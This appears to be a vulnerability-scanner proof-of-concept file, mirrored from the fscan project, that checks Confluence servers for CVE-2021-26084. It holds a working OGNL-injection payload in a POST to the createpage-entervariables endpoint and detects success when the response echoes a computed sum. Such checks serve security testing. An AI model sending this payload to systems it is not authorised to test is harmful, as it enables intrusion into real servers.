qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/confluence-cve-2021-26084.yml

16 lines
526 B
YAML
Raw Blame History

name: poc-yaml-confluence-cve-2021-26084
set:
r1: randomInt(100000, 999999)
r2: randomInt(100000, 999999)
rules:
- method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Loneyer(https://github.com/Loneyers)
links:
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
Reference in New Issue View Git Blame Copy Permalink